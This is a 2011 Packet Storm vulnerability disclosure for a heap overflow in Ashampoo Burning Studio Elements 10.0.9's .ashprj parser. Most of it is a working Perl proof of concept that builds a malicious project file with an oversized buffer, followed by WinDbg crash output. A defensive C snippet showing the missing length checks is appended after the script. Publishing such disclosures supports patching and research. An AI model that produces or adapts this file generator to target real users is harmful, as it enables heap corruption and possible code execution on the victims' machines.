Ashampoo Burning Studio Elements 10.0.9 Heap Overflow

Posted Oct 3, 2011
Authored by LiquidWorm | Site zeroscience.mk

Ashampoo Burning Studio Elements version 10.0.9 suffers from a heap overflow vulnerability. It fails to properly sanitize user-supplied input when parsing the .ashprj project file format, resulting in a crash that corrupts heap memory. An attacker can use this to lure unsuspecting users into opening maliciously crafted .ashprj files, with a potential for arbitrary code execution on the affected system.

tags | exploit, overflow, arbitrary, code execution
SHA-256 | f75aa6cbf3a17f5685e22633550ca4c85791c38d464e76137942ed86c5fbeea8

#!/usr/bin/perl
#
#
# Ashampoo Burning Studio Elements 10.0.9 (.ashprj) Heap Overflow Vulnerability
#
#
# Vendor: Ashampoo GmbH & Co. KG
# Product web page: http://www.ashampoo.com
# Affected version: 10.0.9
#
# Summary: Ashampoo Burning Studio Elements offers you everything you need to
# burn movies, music and data - fast and effectively. The software with the
# intuitive user interface focuses on the core competencies of burning software
# and offers you compact functions to tackle all tasks relating to your burning
# projects – easily create data discs, burn backups, rip music, create audio CDs
# or burn already existing film files on Blu-ray Disc and lots more.
#
# Desc: The application suffers from a heap overflow vulnerability because it
# fails to properly sanitize user-supplied input when parsing the .ashprj
# project file format, resulting in a crash that corrupts heap memory. An
# attacker can use this to lure unsuspecting users into opening maliciously
# crafted .ashprj files, with a potential for arbitrary code execution on the
# affected system.
#
# ---------------------------------------------------------------------------
#
# HEAP[burningstudioelements.exe]: Heap block at 051F7F08 modified at 051F7F86 past requested size of 76
# (f10.26c): Break instruction exception - code 80000003 (first chance)
# eax=051f7f08 ebx=051f7f86 ecx=7c91d4fd edx=00f1eca5 esi=051f7f08 edi=00000076
# eip=7c90120e esp=00f1eea8 ebp=00f1eeac iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
# 0:000> g
# HEAP[burningstudioelements.exe]: Invalid Address specified to RtlFreeHeap( 01A70000, 051F7F10 )
# (f10.26c): Break instruction exception - code 80000003 (first chance)
# eax=051f7f08 ebx=051f7f08 ecx=7c91d4fd edx=00f1ecb6 esi=01a70000 edi=051f7f08
# eip=7c90120e esp=00f1eec0 ebp=00f1eec4 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
# 0:000> d edi
# 051f7f08 12 00 06 00 02 07 1a 01-01 00 00 00 e8 5c a0 e6 .............\..
# 051f7f18 cb f9 c3 b3 0c e8 5c a0-e6 cb 41 42 41 42 41 42 ......\...ABABAB
# 051f7f28 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42 ABABABABABABABAB
# 051f7f38 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42 ABABABABABABABAB
# 051f7f48 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42 ABABABABABABABAB
# 051f7f58 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42 ABABABABABABABAB
# 051f7f68 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42 ABABABABABABABAB
# 051f7f78 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 ab ABABABABABABABA.
#
# ---------------------------------------------------------------------------
#
#
# Tested on: Microsoft Windows XP Pro SP3 (En)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2011-5050
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5050.php
#
#
# 28.09.2011
#


use strict;

system("color 80");

my $filefm = "Aodrulez.ashprj"; # ;)

&banner;
print "\nThis PoC script will create the $filefm file!\n\n";
system("pause");

my $buffer = "\x41\x42" x 50000; # 100000-byte "AB" pattern, the data seen spilling past the heap block in the dump above

my $header = "\x61\x73\x68\x70\x72\x6A\x00\x00\x0A\x00\x00\x00\x00\x00\x00\x56". #0x03 (ETX) removed.
"\x45\x52\x53\x08\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01".
"\x00\x00\x00\x66\x50\x52\x4A\xEA\x02\x00\x00\x00\x00\x00\x00\x49".
"\x44\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x70\x00\x72\x00\x6F".
"\x00\x6A\x00\x65\x00\x63\x00\x74\x00\x2E\x00\x64\x00\x61\x00\x74".
"\x00\x61\x00\x64\x00\x69\x00\x73\x00\x63\x00\x66\x50\x50\x53\x00".
"\x00\x00\x00\x00\x00\x00\x00\x66\x50\x52\x4D\x10\x00\x00\x00\x00".
"\x00\x00\x00\x46\x4C\x41\x47\x04\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x66\x43\x4D\x50\x56\x02\x00\x00\x00\x00\x00\x00\x54".
"\x59\x50\x45\x08\x00\x00\x00\x00\x00\x00\x00\x44\x00\x61\x00\x74".
"\x00\x61\x00\x66\x50\x50\x53\x00\x00\x00\x00\x00\x00\x00\x00\x66".
"\x46\x53\x00\x88\x00\x00\x00\x00\x00\x00\x00\x46\x53\x00\x00\x36".
"\x00\x00\x00\x00\x00\x00\x00\x44\x00\x69\x00\x73\x00\x63\x00\x54".
"\x00\x79\x00\x70\x00\x65\x00\x41\x00\x70\x00\x70\x00\x72\x00\x6F".
"\x00\x70\x00\x72\x00\x69\x00\x61\x00\x74\x00\x65\x00\x2E\x00\x50".
"\x00\x72\x00\x69\x00\x6D\x00\x61\x00\x72\x00\x79\x00\x46\x53\x00".
"\x00\x3A\x00\x00\x00\x00\x00\x00\x00\x44\x00\x69\x00\x73\x00\x63".
"\x00\x54\x00\x79\x00\x70\x00\x65\x00\x41\x00\x70\x00\x70\x00\x72".
"\x00\x6F\x00\x70\x00\x72\x00\x69\x00\x61\x00\x74\x00\x65\x00\x2E".
"\x00\x53\x00\x65\x00\x63\x00\x6F\x00\x6E\x00\x64\x00\x61\x00\x72".
"\x00\x79\x00\x4C\x41\x42\x4C\x10\x00\x00\x00\x00\x00\x00\x00\x4D".
"\x00\x79\x00\x20\x00\x46\x00\x69\x00\x6C\x00\x65\x00\x73\x00\x66".
"\x4B\x49\x44\x7A\x01\x00\x00\x00\x00\x00\x00\x66\x46\x44\x52\x6E".
"\x01\x00\x00\x00\x00\x00\x00\x66\x4E\x4F\x44\xC7\x00\x00\x00\x00".
"\x00\x00\x00\x48\x45\x41\x44\x1F\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x80\xEB\x8C\x96\x7D\x35\xE1\xB3\x0C\x80\xEB\x8C\x96".
"\x7D\x35\xE1\xB3\x0C\x80\xEB\x8C\x96\x7D\x35\xE1\xB3\x0C\x4E\x41".
"\x4D\x45\x08\x00\x00\x00\x00\x00\x00\x00\x52\x00\x6F\x00\x6F\x00".
"\x74\x00\x44\x53\x52\x43\x7C\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x74\x00\x00\x00\x66\x00\x69\x00\x6C\x00\x65\x00\x3A\x00".
"\x2F\x00\x2F\x00\x2F\x00\x43\x00\x3A\x00\x2F\x00\x44\x00\x6F\x00".
"\x63\x00\x75\x00\x6D\x00\x65\x00\x6E\x00\x74\x00\x73\x00\x25\x00".
"\x32\x00\x30\x00\x61\x00\x6E\x00\x64\x00\x25\x00\x32\x00\x30\x00".
"\x53\x00\x65\x00\x74\x00\x74\x00\x69\x00\x6E\x00\x67\x00\x73\x00".
"\x2F\x00\x41\x00\x6C\x00\x6C\x00\x25\x00\x32\x00\x30\x00\x55\x00".
"\x73\x00\x65\x00\x72\x00\x73\x00\x2F\x00\x44\x00\x65\x00\x73\x00".
"\x6B\x00\x74\x00\x6F\x00\x70\x00\x2F\x00\x66\x4B\x49\x44\x8F\x00".
"\x00\x00\x00\x00\x00\x00\x66\x4C\x45\x46\x83\x00\x00\x00\x00\x00".
"\x00\x00\x66\x4E\x4F\x44\x77\x00\x00\x00\x00\x00\x00\x00\x48\x45".
"\x41\x44\x27\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xE8\x5C".
"\xA0\xE6\xCB\xF9\xC3\xB3\x0C\xE8\x5C\xA0\xE6\xCB";

my $footer = "\xF9\xC3\xB3\x0C\x28\x80\xBA\xA7\x70\x35\xE1\xB3\x0C\x50\x02\x00".
"\x00\x00\x00\x00\x00\x4E\x41\x4D\x45\x12\x00\x00\x00\x00\x00\x00".
"\x00\x4A\x00\x6F\x00\x78\x00\x79\x00\x31\x00\x2E\x00\x6C\x00\x6E".
"\x00\x6B\x00\x44\x53\x52\x43\x1A\x00\x00\x00\x00\x00\x00\x00\x3A".
"\x00\x00\x00\x12\x00\x00\x00\x4A\x00\x6F\x00\x78\x00\x79\x00\x31".
"\x00\x2E\x00\x6C\x00\x6E\x00\x6B\x00\x66\x43\x4D\x50\x28\x00\x00".
"\x00\x00\x00\x00\x00\x54\x59\x50\x45\x10\x00\x00\x00\x00\x00\x00".
"\x00\x45\x00\x6C\x00\x54\x00\x6F\x00\x72\x00\x69\x00\x74\x00\x6F".
"\x00\x66\x50\x50\x53\x00\x00\x00\x00\x00\x00\x00\x00";

my $fringe = $header.$buffer.$footer;

print "\n - Preparing to write to file...\n";
sleep 1;
open (my $prj, '>', "./$filefm") || die "\nCan't open $filefm: $!";
binmode($prj); # write raw bytes; without this the 0x0A in the header becomes CR LF on Windows
print "\n - Writing to file...\n";
print $prj $fringe;
close ($prj);
sleep 2;
print "\n - File \"$filefm\" successfully crafted!\n\n - t00t!\n";

sub banner {

print "\n";
print "_" x 51;
print "\n\n Ashampoo Burning Studio Elements 10 Heap Overflow\n\n";
print "\tCopyleft (c) 2011 - Zero Science Lab\n\n";
print "\t\tID: ZSL-2011-5050\n\n";
print "_" x 51;
print "\n";

}

#EOF
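The length check the vulnerable parser described above is missing, as an added example that is not part of the advisory or the PoC: a reader for tag/length/payload chunks of the kind the crafted file appears to use, validating each declared length against both the remaining input and the fixed-size destination block. The chunk layout (4-byte tag, 8-byte little-endian length), FIELD_MAX and all function names are assumptions inferred from the PoC bytes and the crash output, not vendor documentation.

```c
#include <stdint.h>
#include <string.h>
/* Fixed heap block a crafted field overflows; 0x76 matches "past requested
 * size of 76" in the advisory's debugger output. */
#define FIELD_MAX 0x76

/* Assumed chunk layout, read off the PoC bytes: 4-byte tag, 8-byte
 * little-endian length, then payload. Hypothetical, not vendor-documented. */
struct chunk { char tag[4]; uint64_t len; const uint8_t *data; };

static uint64_t rd_u64le(const uint8_t *p) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}

/* Parse one chunk from [p, p+avail). An unchecked reader trusts the declared
 * length; this one rejects any length longer than the bytes that remain. */
int read_chunk_safe(const uint8_t *p, size_t avail, struct chunk *c) {
    if (avail < 12) return 0;
    uint64_t len = rd_u64le(p + 4);
    if (len > avail - 12) return 0;
    memcpy(c->tag, p, 4);
    c->len = len;
    c->data = p + 12;
    return 1;
}

/* Copy a payload into a FIELD_MAX-byte block, refusing oversized input rather
 * than writing past the allocation the way the vulnerable parser does. */
int copy_field_safe(const struct chunk *c, uint8_t *dst) {
    if (c->len > FIELD_MAX) return 0;
    memcpy(dst, c->data, (size_t)c->len);
    return 1;
}

/* Constructed inputs: a well-formed NAME chunk ("Root" in UTF-16LE, as in the
 * PoC header) and the same chunk with its length inflated to 0xC350 (50000). */
int run_demo(void) {
    uint8_t good[20] = {'N','A','M','E',8,0,0,0,0,0,0,0,'R',0,'o',0,'o',0,'t',0};
    uint8_t bad[20], dst[FIELD_MAX]; struct chunk c; int ok = 0;
    memcpy(bad, good, sizeof bad);
    bad[4] = 0x50; bad[5] = 0xC3;
    if (read_chunk_safe(good, sizeof good, &c) && copy_field_safe(&c, dst) &&
        dst[0] == 'R') ok |= 1;                 /* accept path */
    if (!read_chunk_safe(bad, sizeof bad, &c)) ok |= 2; /* reject path */
    return ok;                                  /* 3 when both behave */
}
```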
packet storm

© 2022 Packet Storm. All rights reserved.